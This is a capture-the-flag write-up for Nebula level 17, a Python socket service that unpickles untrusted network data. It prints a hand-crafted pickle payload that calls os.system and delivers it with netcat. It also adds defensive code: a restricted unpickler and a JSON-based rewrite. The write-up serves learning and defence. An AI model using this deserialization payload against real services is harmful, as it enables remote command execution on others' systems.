Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”
Python! Nice. The Nebula war game uses a variety of languages, which is fantastic. We are provided with the following source code:
    #!/usr/bin/python
    import os
    import pickle
    import time
    import socket
    import signal
    signal.signal(signal.SIGCHLD, signal.SIG_IGN)
    def server(skt):
      line = skt.recv(1024)
      # raw bytes from the network are handed straight to pickle.loads()
      obj = pickle.loads(line)
      for i in obj:
          clnt.send("why did you send me " + i + "?\n")  # uses the global clnt, not skt
    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    skt.bind(('0.0.0.0', 10007))
    skt.listen(10)
    while True:
      clnt, addr = skt.accept()
      if(os.fork() == 0):
          clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
          server(clnt)
          exit(1)
I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.
The majority of the information on pickle will present you with this warning:
    Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Never trust the user :)
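For the defender's side of that warning, here is an added example (my own code, not part of the level or the original post) showing two ways the listener could have been written so that untrusted bytes never reach a global lookup. It is Python 3, whereas the level's script is Python 2. The first is the approach the pickle documentation itself suggests: subclass `pickle.Unpickler` and override `find_class` so that any `c`/`STACK_GLOBAL` reference is refused before a `R` (reduce) opcode can call it. The second replaces pickle with JSON and validates that the result is really the list of strings the service expects. The constants `BENIGN_PICKLE` and `GLOBAL_REF_PICKLE` are constructed samples; the second merely references a harmless function and is there only to show the rejection path.

```python
import io
import json
import os
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global reference.

    The listener only ever needs a list of strings, which pickles without
    any GLOBAL/STACK_GLOBAL opcodes, so every attempt to look up a
    callable is rejected before anything can be instantiated or called.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "refusing to resolve global %s.%s in untrusted pickle" % (module, name)
        )


def restricted_loads(data):
    """Drop-in replacement for pickle.loads() that uses RestrictedUnpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_or_error(data):
    """Return (value, None) on success or (None, message) when the data is rejected."""
    try:
        return restricted_loads(data), None
    except pickle.UnpicklingError as exc:
        return None, str(exc)


def handle_json(line):
    """Safer replacement for the body of server(): parse JSON instead of pickle,
    check the shape, and return the reply lines the original would have sent."""
    try:
        obj = json.loads(line.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return ["bad request\n"]
    if not isinstance(obj, list) or not all(isinstance(i, str) for i in obj):
        return ["bad request\n"]
    return ["why did you send me " + i + "?\n" for i in obj]


# Constructed samples (assumptions for this example, not data from the level):
BENIGN_PICKLE = pickle.dumps(["a", "b"])          # the shape the service expects
GLOBAL_REF_PICKLE = pickle.dumps(os.getcwd)       # references a function, never calls it


if __name__ == "__main__":
    print(loads_or_error(BENIGN_PICKLE))          # (['a', 'b'], None)
    print(loads_or_error(GLOBAL_REF_PICKLE))      # (None, 'refusing to resolve global ...')
    print(handle_json(b'["a", "b"]'))
    print(handle_json(b'not json'))
```

Run against the payload shown later in this post, `restricted_loads` raises at the very first `c` opcode (`os` / `system`), so the `R` opcode that would invoke the function is never reached; the JSON variant never has that problem because JSON has no notion of a callable at all.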
Let’s craft some malicious data:
    level17@nebula:~$ cat foo
    cos
    system
    (S'getflag > /home/flag17/output'
    tR.
When unpickled, this data resolves `os.system` (the `c` opcode) and then calls it (the `R` opcode) with the string argument, so the listener runs `getflag > /home/flag17/output` as flag17. Let’s direct it at the listener using netcat.
    level17@nebula:~$ nc localhost 10007 < foo
    Accepted connection from 127.0.0.1:44614^C
    level17@nebula:~$ cat /home/flag17/output
    You have successfully executed getflag on a target account
Woo, on to the next level!